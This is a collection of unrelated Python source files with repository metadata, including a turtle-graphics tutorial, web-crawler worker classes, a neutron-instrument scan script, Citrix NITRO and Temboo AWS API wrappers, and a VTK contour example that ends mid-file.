| 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,806 |
py
|
How to Get Coordinate Of Screen in Python Turtle ?
Turtle is a special feature in python which contains a graphical library. In
this article we will learn how to Get Coordinate Of Screen in Python Turtle.
Turtle has many built in function to create this program we use following.
> **import turtle – > **This is the python library which allow us to access
> turtle library.
>
> **Turtle()– >** This Method is used to make object.
>
> **onscreenclick(functionname,1) – > **This is turtle function which sends
> the coordinate to function; 1 is for left click and 3 is for Right click
>
>
>
>
>
>
>
> **speed()– > **This is used to increse or decrease the speed of turtle
> pointer.
>
> **listen()– > T**his allows the server to listen to incoming connections.
>
> **done()– > **This is used to hold the the screen.
## Python3
__
__
__
__
__
__
__
# turtle library
import turtle
#This to make turtle object
tess=turtle.Turtle()
# self defined function to print coordinate
def buttonclick(x,y):
print("You clicked at this coordinate({0},{1})".format(x,y))
#onscreen function to send coordinate
turtle.onscreenclick(buttonclick,1)
turtle.listen() # listen to incoming connections
turtle.speed(10) # set the speed
turtle.done() # hold the screen
---
__
__
### **Output:**

Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
|
[
"[email protected]"
] | |
9c32a0e4932286ee4c8d66addc4f77cfc63023fb
|
919e3e3d772d6a79e7639bde32bf698088bc241f
|
/pyspider/result/result_worker.py
|
ddfd7545d8dc0fc20273f9cb2192499ca363bee4
|
[
"Apache-2.0"
] |
permissive
|
UoToGK/crawler-pyspider
|
96cfee1e16db1376b5ea0c5fa51650a04c14f714
|
29ba13905c73081097df9ef646a5c8194eb024be
|
refs/heads/master
| 2023-09-05T18:33:17.470385 | 2021-11-05T10:44:15 | 2021-11-05T10:44:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,619 |
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<[email protected]>
# http://binux.me
# Created on 2014-10-19 15:37:46
import time
import json
import logging
from six.moves import queue as Queue
from pyspider.helper.logging import task_log
logger = logging.getLogger("result")
class ResultWorker(object):
"""
do with result
override this if needed.
"""
def __init__(self, resultdb, inqueue):
self.resultdb = resultdb
self.inqueue = inqueue
self._quit = False
def on_result(self, task, result):
task_log(task, 'on result')
'''Called every result'''
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
return self.resultdb.save(
project=task['project'],
taskid=task['taskid'],
url=task['url'],
result=result
)
else:
logger.warning('result UNKNOW -> %.30r' % result)
return
def quit(self):
self._quit = True
def run(self):
'''Run loop'''
logger.info("result_worker starting...")
while not self._quit:
try:
task, result = self.inqueue.get(timeout=1)
self.on_result(task, result)
except Queue.Empty as e:
continue
except KeyboardInterrupt:
break
except AssertionError as e:
logger.error(e)
continue
except Exception as e:
logger.exception(e)
continue
logger.info("result_worker exiting...")
class OneResultWorker(ResultWorker):
'''Result Worker for one mode, write results to stdout'''
def on_result(self, task, result):
'''Called every result'''
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
print(json.dumps({
'taskid': task['taskid'],
'project': task['project'],
'url': task['url'],
'result': result,
'updatetime': time.time()
}))
else:
logger.warning('result UNKNOW -> %.30r' % result)
return
|
[
"[email protected]"
] | |
71e40389f60fb122edde1239c65f8e55412083f9
|
9d7d69178c6f1f1db6ed6767e0af32bfe836549c
|
/new_workspace/Gumtree_Workspace/Magnet/Yick/P9363/100 Alignment/20210130/Overnight/2021_Jan_Yick_scan_time_56_1K_125Oe_ZFC_40min.py
|
9cf66fe21d2297a88318f687b3e726608073a945
|
[] |
no_license
|
Gumtree/Quokka_scripts
|
217958288b59adbdaf00a9a13ece42f169003889
|
c9687d963552023d7408a8530005a99aabea1697
|
refs/heads/master
| 2023-08-30T20:47:32.142903 | 2023-08-18T03:38:09 | 2023-08-18T03:38:09 | 8,191,387 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,299 |
py
|
histmem preset 60
histmem mode time
#Time scan
#-----------------------------------------------------------------
#System reset (15 minutes)
hset /sample/tc1/control/tolerance1 1
drive ma1_setpoint 0
drive tc1_driveable 90
wait 10
drive tc1_driveable 4
drive ma1_setpoint 125
wait 10
hset /sample/tc1/control/tolerance1 0.2
drive tc1_driveable 50
# drive tc1_driveable 52
drive tc1_driveable 54
# drive tc1_driveable 54
drive tc1_driveable 55.5
hset /sample/tc1/control/tolerance1 0.1
drive tc1_driveable 56.1
wait 10
#-----------------------------------------------------------------
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 10 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 20 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 30 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 40 minutes
|
[
"[email protected]"
] | |
df954ffd8fb22a7384f0c0b74354af4e06877fbd
|
ba3231b25c60b73ca504cd788efa40d92cf9c037
|
/nitro-python-13.0.36/nssrc/com/citrix/netscaler/nitro/resource/config/vpn/vpnglobal_auditnslogpolicy_binding.py
|
c1cabb6314b245dc9c55e206d4e52a73885a3693
|
[
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
zhuweigh/vpx13
|
f6d559ae85341e56472e3592cbc67062dac34b93
|
b36caa3729d3ca5515fa725f2d91aeaabdb2daa9
|
refs/heads/master
| 2020-07-04T22:15:16.595728 | 2019-09-20T00:19:56 | 2019-09-20T00:19:56 | 202,435,307 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,299 |
py
|
#
# Copyright (c) 2008-2019 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class vpnglobal_auditnslogpolicy_binding(base_resource) :
""" Binding class showing the auditnslogpolicy that can be bound to vpnglobal.
"""
def __init__(self) :
self._policyname = None
self._priority = None
self._secondary = None
self._groupextraction = None
self._gotopriorityexpression = None
self._feature = None
self.___count = None
@property
def priority(self) :
r"""Integer specifying the policy's priority. The lower the priority number, the higher the policy's priority. Maximum value for default syntax policies is 2147483647 and for classic policies is 64000.<br/>Minimum value = 0<br/>Maximum value = 2147483647.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
r"""Integer specifying the policy's priority. The lower the priority number, the higher the policy's priority. Maximum value for default syntax policies is 2147483647 and for classic policies is 64000.<br/>Minimum value = 0<br/>Maximum value = 2147483647
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def policyname(self) :
r"""The name of the policy.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
r"""The name of the policy.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def feature(self) :
r"""The feature to be checked while applying this config.
"""
try :
return self._feature
except Exception as e:
raise e
@feature.setter
def feature(self, feature) :
r"""The feature to be checked while applying this config.
"""
try :
self._feature = feature
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
r"""Applicable only to advance vpn session policy. An expression or other value specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
r"""Applicable only to advance vpn session policy. An expression or other value specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def secondary(self) :
r"""Bind the authentication policy as the secondary policy to use in a two-factor configuration. A user must then authenticate not only to a primary authentication server but also to a secondary authentication server. User groups are aggregated across both authentication servers. The user name must be exactly the same on both authentication servers, but the authentication servers can require different passwords.
"""
try :
return self._secondary
except Exception as e:
raise e
@secondary.setter
def secondary(self, secondary) :
r"""Bind the authentication policy as the secondary policy to use in a two-factor configuration. A user must then authenticate not only to a primary authentication server but also to a secondary authentication server. User groups are aggregated across both authentication servers. The user name must be exactly the same on both authentication servers, but the authentication servers can require different passwords.
"""
try :
self._secondary = secondary
except Exception as e:
raise e
@property
def groupextraction(self) :
r"""Bind the Authentication policy to a tertiary chain which will be used only for group extraction. The user will not authenticate against this server, and this will only be called it primary and/or secondary authentication has succeeded.
"""
try :
return self._groupextraction
except Exception as e:
raise e
@groupextraction.setter
def groupextraction(self, groupextraction) :
r"""Bind the Authentication policy to a tertiary chain which will be used only for group extraction. The user will not authenticate against this server, and this will only be called it primary and/or secondary authentication has succeeded.
"""
try :
self._groupextraction = groupextraction
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(vpnglobal_auditnslogpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.vpnglobal_auditnslogpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = vpnglobal_auditnslogpolicy_binding()
updateresource.policyname = resource.policyname
updateresource.priority = resource.priority
updateresource.secondary = resource.secondary
updateresource.groupextraction = resource.groupextraction
updateresource.gotopriorityexpression = resource.gotopriorityexpression
updateresource.feature = resource.feature
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [vpnglobal_auditnslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].policyname = resource[i].policyname
updateresources[i].priority = resource[i].priority
updateresources[i].secondary = resource[i].secondary
updateresources[i].groupextraction = resource[i].groupextraction
updateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression
updateresources[i].feature = resource[i].feature
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = vpnglobal_auditnslogpolicy_binding()
deleteresource.policyname = resource.policyname
deleteresource.secondary = resource.secondary
deleteresource.groupextraction = resource.groupextraction
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [vpnglobal_auditnslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].policyname = resource[i].policyname
deleteresources[i].secondary = resource[i].secondary
deleteresources[i].groupextraction = resource[i].groupextraction
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service) :
r""" Use this API to fetch a vpnglobal_auditnslogpolicy_binding resources.
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, filter_) :
r""" Use this API to fetch filtered set of vpnglobal_auditnslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service) :
r""" Use this API to count vpnglobal_auditnslogpolicy_binding resources configued on NetScaler.
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, filter_) :
r""" Use this API to count the filtered set of vpnglobal_auditnslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Crlcheck:
Mandatory = "Mandatory"
Optional = "Optional"
class Feature:
WL = "WL"
WebLogging = "WebLogging"
SP = "SP"
SurgeProtection = "SurgeProtection"
LB = "LB"
LoadBalancing = "LoadBalancing"
CS = "CS"
ContentSwitching = "ContentSwitching"
CR = "CR"
CacheRedirection = "CacheRedirection"
SC = "SC"
SureConnect = "SureConnect"
CMP = "CMP"
CMPcntl = "CMPcntl"
CompressionControl = "CompressionControl"
PQ = "PQ"
PriorityQueuing = "PriorityQueuing"
HDOSP = "HDOSP"
HttpDoSProtection = "HttpDoSProtection"
SSLVPN = "SSLVPN"
AAA = "AAA"
GSLB = "GSLB"
GlobalServerLoadBalancing = "GlobalServerLoadBalancing"
SSL = "SSL"
SSLOffload = "SSLOffload"
SSLOffloading = "SSLOffloading"
CF = "CF"
ContentFiltering = "ContentFiltering"
IC = "IC"
IntegratedCaching = "IntegratedCaching"
OSPF = "OSPF"
OSPFRouting = "OSPFRouting"
RIP = "RIP"
RIPRouting = "RIPRouting"
BGP = "BGP"
BGPRouting = "BGPRouting"
REWRITE = "REWRITE"
IPv6PT = "IPv6PT"
IPv6protocoltranslation = "IPv6protocoltranslation"
AppFw = "AppFw"
ApplicationFirewall = "ApplicationFirewall"
RESPONDER = "RESPONDER"
HTMLInjection = "HTMLInjection"
push = "push"
NSPush = "NSPush"
NetScalerPush = "NetScalerPush"
AppFlow = "AppFlow"
CloudBridge = "CloudBridge"
ISIS = "ISIS"
ISISRouting = "ISISRouting"
CH = "CH"
CallHome = "CallHome"
AppQoE = "AppQoE"
ContentAccelerator = "ContentAccelerator"
SYSTEM = "SYSTEM"
RISE = "RISE"
FEO = "FEO"
LSN = "LSN"
LargeScaleNAT = "LargeScaleNAT"
RDPProxy = "RDPProxy"
Rep = "Rep"
Reputation = "Reputation"
URLFiltering = "URLFiltering"
VideoOptimization = "VideoOptimization"
ForwardProxy = "ForwardProxy"
SSLInterception = "SSLInterception"
AdaptiveTCP = "AdaptiveTCP"
CQA = "CQA"
CI = "CI"
ContentInspection = "ContentInspection"
class Ocspcheck:
Mandatory = "Mandatory"
Optional = "Optional"
class Staaddresstype:
IPV4 = "IPV4"
IPV6 = "IPV6"
class vpnglobal_auditnslogpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.vpnglobal_auditnslogpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.vpnglobal_auditnslogpolicy_binding = [vpnglobal_auditnslogpolicy_binding() for _ in range(length)]
|
[
"[email protected]"
] | |
068bfe1d684059513b8ff1b15160ec145471ffc3
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Amazon/IAM/GetGroupPolicy.py
|
f85f2b09ae61777531adae6278c6723fdd2e9698
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,397 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# GetGroupPolicy
# Retrieves the specified policy document for the specified group.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetGroupPolicy(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetGroupPolicy Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Amazon/IAM/GetGroupPolicy')
def new_input_set(self):
return GetGroupPolicyInputSet()
def _make_result_set(self, result, path):
return GetGroupPolicyResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetGroupPolicyChoreographyExecution(session, exec_id, path)
class GetGroupPolicyInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetGroupPolicy
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSSecretKeyId', value)
def set_GroupName(self, value):
"""
Set the value of the GroupName input for this Choreo. ((required, string) The name of the group to return.)
"""
InputSet._set_input(self, 'GroupName', value)
def set_PolicyName(self, value):
"""
Set the value of the PolicyName input for this Choreo. ((required, string) Name of the policy document to get.)
"""
InputSet._set_input(self, 'PolicyName', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
InputSet._set_input(self, 'ResponseFormat', value)
class GetGroupPolicyResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetGroupPolicy Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class GetGroupPolicyChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetGroupPolicyResultSet(response, path)
|
[
"[email protected]"
] | |
44153f43db578ddeaf085d737762fe112938c9e7
|
eb79c567ca500b39e268eb270c792688a20b1f08
|
/generatePage.py
|
4c7ad31a6e6ca54e0c7c6645be1c034961e043c9
|
[] |
no_license
|
RickeyEstes2/arxiv-equations
|
db746ba993a2a6ad9907594e15e6148acd52ac85
|
93047961d9de04d7aa79635a6f59a8680242637b
|
refs/heads/master
| 2023-03-16T12:19:41.378386 | 2018-11-26T05:20:06 | 2018-11-26T05:20:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,666 |
py
|
#!/usr/bin/env python
# This script will read in a pickle that includes extracted metadata and
# equations from an article, and general yaml (with front end matter) to
# render into a page.
import pickle
import operator
import frontmatter
import os
import sys
from helpers import get_equation_counts
input_pkl = sys.argv[1]
# We should be in directory where script is running
here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)
posts = '%s/_posts' %here
if not os.path.exists(here):
os.mkdir(here)
# result.keys()
# dict_keys(['equations', 'metadata', 'inputFile', 'latex', 'uid']
################################################################################
# ARTICLE TEMPLATE
################################################################################
# Don't continue unless we have metrics file
if not os.path.exists(input_pkl):
print('Cannot find metrics file, exiting')
sys.exit(1)
result = pickle.load(open(input_pkl,'rb'))
template = frontmatter.load('%s/templates/article-template.md' %here)
template.content = result['metadata']['summary']
# Add metadata to template, only specific fields
template.metadata['id'] = result['metadata']['id']
template.metadata['updated'] = result['metadata']['updated']
template.metadata['published'] = result['metadata']['published']
# Parse year, month, day
month = result['metadata']['published_parsed'].tm_mon
day = result['metadata']['published_parsed'].tm_mday
year = result['metadata']['published_parsed'].tm_year
template.metadata['published_month'] = month
template.metadata['published_day'] = day
template.metadata['published_year'] = year
template.metadata['title'] = result['metadata']['title']
template.metadata['search_query'] = result['metadata']['title_detail']['base']
template.metadata['title_detail'] = result['metadata']['title_detail']['value']
template.metadata['authors'] = result['metadata']['authors']
template.metadata['comment'] = result['metadata']['arxiv_comment']
# Parse links into list
links = []
for link in result['metadata']['links']:
links.append(link['href'])
template.metadata['links'] = links
template.metadata['category'] = result['metadata']['arxiv_primary_category']['term']
template.metadata['topic'] = result['metadata']['arxiv_primary_category']['term']
# Tags
tags = []
for tag in result['metadata']['tags']:
tags.append(tag['term'])
template.metadata['tags'] = tags
template.metadata['pdf_url'] = result['metadata']['pdf_url']
template.metadata['arxiv_url'] = result['metadata']['arxiv_url']
# Equations
raw = [e.replace('\\\\','\\') for e in result['equations']]
# Let's count instead
equations = get_equation_counts(raw)
# Get total count to calculate percent
total = 0
for e,count in equations.items():
total += count
# Let's make total width 900px
# Ensure is sorted
equation_list = []
for item in sorted(equations.items(), key=operator.itemgetter(1)):
percent = item[1] / total
pixels = round(percent * 900, 0)
equation_list.append({'equation': item[0],
'count': item[1],
'pixels': pixels,
'percent': round(100*percent,2) })
# Greatest to least
equation_list.reverse()
template.metadata['equations'] = equation_list
template.metadata['equations_total'] = total
# Write to File
output_dir = os.path.abspath('%s/_posts/%s/%s' % (here, year, month))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
outfile = os.path.join(output_dir, '%s-%02d-%02d-%s.md' %(year, month, day, result['uid'].replace('/','-')))
with open(outfile, 'w') as filey:
filey.writelines(frontmatter.dumps(template))
|
[
"[email protected]"
] | |
3148c6e92aa0af98497ad72eadb37962a9b50cd9
|
92065e3b378edc8e0570e4295aca0968de3c852d
|
/rosalind_frmt.py
|
c3178a9ffd4e87839daefb1e149757e2ceb3005d
|
[] |
no_license
|
sunhuaiyu/rosalind
|
18dc9fa78aaa84b478b112089a3b94d0f442b1bb
|
7181cc9215d3ea0b5ad9d0811c00e01fd9f20b1c
|
refs/heads/master
| 2020-04-04T17:53:17.437595 | 2019-04-11T17:03:52 | 2019-04-11T17:03:52 | 25,007,403 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 404 |
py
|
# sun.huaiyu
# gbk
from Bio import Entrez, SeqIO
Entrez.email = '[email protected]'
f = open('rosalind_frmt.txt')
ids = f.readline().split()
handle = Entrez.efetch(db='nucleotide', id=[', '.join(ids)], rettype='fasta')
records = list(SeqIO.parse(handle, 'fasta'))
shortest = sorted(records, key=lambda x: len(x.seq))[0]
f = open('rosalind_frmt_ans.txt', 'wt')
f.write(shortest.format('fasta'))
f.close()
|
[
"[email protected]"
] | |
3ec6354d03c41e1a6cb36925667ad36dcc433e98
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_issue.py
|
00ab7aacb2f25fe5d71d73b0fb32f899b9120904
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 823 |
py
|
#calss header
class _ISSUE():
def __init__(self,):
self.name = "ISSUE"
self.definitions = [u'a subject or problem that people are thinking and talking about: ', u'most important in what is being discussed: ', u'to make something seem more important than it should be, or to argue about it: ', u'to disagree strongly: ', u'to have difficulty or disagreement with someone or something: ', u'a set of newspapers or magazines published at the same time or a single copy of a newspaper or magazine: ', u'An issue of shares is a time when a company gives people the chance to buy part of it or gives extra shares to people who already own some.']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"[email protected]"
] | |
4d48ca0b1e607e8bfce731a23c9d6dde8dd48770
|
a680b681210a070ff6ac3eab4ed3ea5a125991d6
|
/spider/instances/inst_fetch.py
|
487fe1d57881e518171e2bb08fc2984b632fe21c
|
[
"BSD-2-Clause"
] |
permissive
|
moonbirdxp/PSpider
|
bb6da1de6a78d86ee8704b6eb8981773a1a31d8c
|
4d7238b4ebafd129ecc5dd1095ce1ece313945ec
|
refs/heads/master
| 2020-06-22T03:46:17.320420 | 2019-07-16T03:26:20 | 2019-07-16T04:44:17 | 197,624,496 | 0 | 0 |
BSD-2-Clause
| 2019-10-15T01:04:19 | 2019-07-18T16:48:09 |
Python
|
UTF-8
|
Python
| false | false | 1,711 |
py
|
# _*_ coding: utf-8 _*_
"""
inst_fetch.py by xianhu
"""
import time
import random
class Fetcher(object):
"""
class of Fetcher, must include function working()
"""
def __init__(self, sleep_time=0, max_repeat=3):
"""
constructor
:param sleep_time: default 0, sleeping time after a fetching
:param max_repeat: default 3, maximum repeat count of a fetching
"""
self._sleep_time = sleep_time
self._max_repeat = max_repeat
return
def working(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
working function, must "try, except" and don't change the parameters and returns
:return fetch_state: can be -1(fetch failed), 0(need repeat), 1(fetch success)
:return content: can be any object, or exception information[class_name, excep]
:return proxies_state: can be -1(unavaiable), 0(return to queue), 1(avaiable)
"""
time.sleep(random.randint(0, self._sleep_time))
try:
fetch_state, content, proxies_state = self.url_fetch(priority, url, keys, deep, repeat, proxies=proxies)
except Exception as excep:
fetch_state, content, proxies_state = (-1 if repeat >= self._max_repeat else 0), [self.__class__.__name__, str(excep)], -1
return fetch_state, content, proxies_state
def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
fetch the content of a url, you must overwrite this function, parameters and returns refer to self.working()
"""
raise NotImplementedError
|
[
"[email protected]"
] | |
ba8e796d0931eec1c2ee5edeb7c0e03f0475c60a
|
482b695d09d721d2d1731cf50e3928e058e44916
|
/src/Python/StructuredPoints/Vol.py
|
bd3d72e56d26d82c9969ed3d20b53525bd0b1dff
|
[
"Apache-2.0"
] |
permissive
|
numminorih/vtk-examples
|
b9d5c35f62dc287c6633b05ab4fb14033100bee8
|
2e3922a61cf4ef428c013d56d754742ff880b3cf
|
refs/heads/master
| 2023-07-29T05:56:23.235478 | 2021-09-07T22:58:41 | 2021-09-07T22:58:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,639 |
py
|
#!/usr/bin/env python
import vtk
def main():
colors = vtk.vtkNamedColors()
renderer = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(renderer)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
vol = vtk.vtkStructuredPoints()
vol.SetDimensions(26, 26, 26)
vol.SetOrigin(-0.5, -0.5, -0.5)
sp = 1.0 / 25.0
vol.SetSpacing(sp, sp, sp)
scalars = vtk.vtkDoubleArray()
scalars.SetNumberOfComponents(1)
scalars.SetNumberOfTuples(26 * 26 * 26)
for k in range(0, 26):
z = -0.5 + k * sp
kOffset = k * 26 * 26
for j in range(0, 26):
y = -0.5 + j * sp
jOffset = j * 26
for i in range(0, 26):
x = -0.5 + i * sp
s = x * x + y * y + z * z - (0.4 * 0.4)
offset = i + jOffset + kOffset
scalars.InsertTuple1(offset, s)
vol.GetPointData().SetScalars(scalars)
contour = vtk.vtkContourFilter()
contour.SetInputData(vol)
contour.SetValue(0, 0.0)
volMapper = vtk.vtkPolyDataMapper()
volMapper.SetInputConnection(contour.GetOutputPort())
volMapper.ScalarVisibilityOff()
volActor = vtk.vtkActor()
volActor.SetMapper(volMapper)
